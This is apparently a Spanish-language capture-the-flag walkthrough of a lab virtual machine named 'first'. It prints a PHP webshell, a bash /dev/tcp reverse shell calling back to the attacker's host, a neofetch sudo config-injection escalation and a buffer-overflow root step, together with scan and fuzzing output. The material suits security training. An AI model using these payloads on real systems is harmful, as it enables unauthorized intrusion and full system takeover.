Comenzamos con un escaneo general y uno específico de puertos:
nmap -sC -sV -p21,22,80 -oN 02-targeted 192.168.1.31
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-18 14:27 -03
Nmap scan report for 192.168.1.31
Host is up (0.00024s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 0 0 4096 Aug 09 2022 fifth
| drwxr-xr-x 2 0 0 4096 Aug 10 2022 first
| drwxr-xr-x 2 0 0 4096 Aug 09 2022 fourth
| drwxr-xr-x 2 0 0 4096 Aug 09 2022 seccond
|_drwxr-xr-x 2 0 0 4096 Aug 09 2022 third
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.10
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b8:57:5b:81:5a:78:1f:d6:ff:60:39:bb:32:a8:5d:cd (RSA)
| 256 65:8d:43:ec:63:77:d0:39:c0:1b:3e:40:d9:53:1e:ed (ECDSA)
|_ 256 0f:02:ac:df:e1:31:3c:b2:59:f6:b7:59:09:f1:ff:f8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:E1:4D:AB (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.00 secondsLa web y el fuzzing con gobuster no aportan nada útil. El vector está en el FTP anónimo: en la carpeta first hay una imagen JPG que analizamos con stegseek para crackear su passphrase:
❯ stegseek first_Logo.jpg -wl ~/Documentos/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "firstgurl1"
[i] Original filename: "secret.txt".
[i] Extracting to "first_Logo.jpg.out".Extraemos el archivo oculto con steghide:
❯ steghide extract -sf first_Logo.jpg
Anotar salvoconducto:
anot� los datos extra�dos e/"secret.txt".secret.txt contiene un mensaje y una cadena en hexadecimal que decodificamos con xxd, revelando una ruta:
❯ echo "2f 74 30 64 30 5f 6c 31 73 74 5f 66 30 72 5f 66 31 72 35 74" | xxd -r -p
/t0d0_l1st_f0r_f1r5tFuzzeamos ese directorio:
❯ gobuster dir -u http://192.168.1.31/t0d0_l1st_f0r_f1r5t/ -w ~/Documentos/git-clones/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html
...
/index.html (Status: 200) [Size: 205]
/uploads (Status: 301) [Size: 334] [--> http://192.168.1.31/t0d0_l1st_f0r_f1r5t/uploads/]
/photos (Status: 301) [Size: 333] [--> http://192.168.1.31/t0d0_l1st_f0r_f1r5t/photos/]
/upload.php (Status: 200) [Size: 348]
...upload.php permite subir archivos sin restricción de formato, así que subimos una webshell PHP:
<?php
system($_GET['cmd']);
?>❯ curl http://192.168.1.31/t0d0_l1st_f0r_f1r5t/uploads/road_to_reverse.php\?cmd\=whoami
www-dataCon RCE confirmado, lanzamos una reverse shell (con netcat a la escucha):
bash -c "bash -i >& /dev/tcp/192.168.1.10/1234 0>&1"sudo nc -nlvp 1234Obtenemos la primera flag. Iniciamos la escalada con sudo -l:
www-data@first:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on first:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on first:
(first : first) NOPASSWD: /bin/neofetch
www-data@first:/home$Según GTFOBins, neofetch permite inyectar código desde su archivo de configuración. Creamos uno malicioso y lo cargamos como first:
echo 'exec /bin/bash' > config.txtsudo -u first /bin/neofetch --config config.txtYa como first, continuamos con sudo -l:
Matching Defaults entries for first on first:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User first may run the following commands on first:
(ALL) NOPASSWD: /bin/secretEl binario /bin/secret pide una contraseña. La pista del todo list mencionaba un buffer overflow: introduciendo una entrada suficientemente larga, el desbordamiento de la variable que almacena el pass sobrescribe la variable de control, lo que valida el acceso y nos da una shell de root:
first@first:~$ sudo /bin/secret
pass: asdfasdfasdf
correct, input command:bash
root@first:/home/first# whoami
rootObtenemos la flag.
Fin.